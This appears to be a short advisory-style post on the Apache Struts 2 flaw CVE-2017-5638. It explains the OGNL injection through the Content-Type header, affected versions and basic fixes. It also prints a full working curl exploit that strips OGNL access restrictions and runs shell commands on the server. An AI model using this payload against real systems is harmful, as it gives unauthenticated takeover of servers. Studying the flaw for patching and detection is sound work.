Listen to this Post
The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in an HTTP request to a Struts 2 endpoint, the framework attempts to process it for file upload. If the header is crafted with malicious Object-Graph Navigation Language (OGNL) expressions, the flawed exception handling mechanism incorrectly interprets these expressions. Instead of treating the malicious payload as a string for an error message, the framework executes the OGNL expression. OGNL is a powerful expression language integrated with Struts that can access and manipulate the application’s runtime context, including Java beans and functions. This execution happens with the full privileges of the application server, allowing an unauthenticated attacker to achieve remote code execution by submitting a simple, specially crafted HTTP request with a malicious Content-Type value, effectively taking control of the vulnerable server.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: 2017-03-10
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-endpoint`
How Exploit:
Malicious Content-Type header.
OGNL expression injection.
Arbitrary command execution.
Protection from this CVE
Apply vendor patch.
Upgrade Struts version.
Use input validation filters.
Impact:
Complete system compromise.
Arbitrary code execution.
Data breach.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

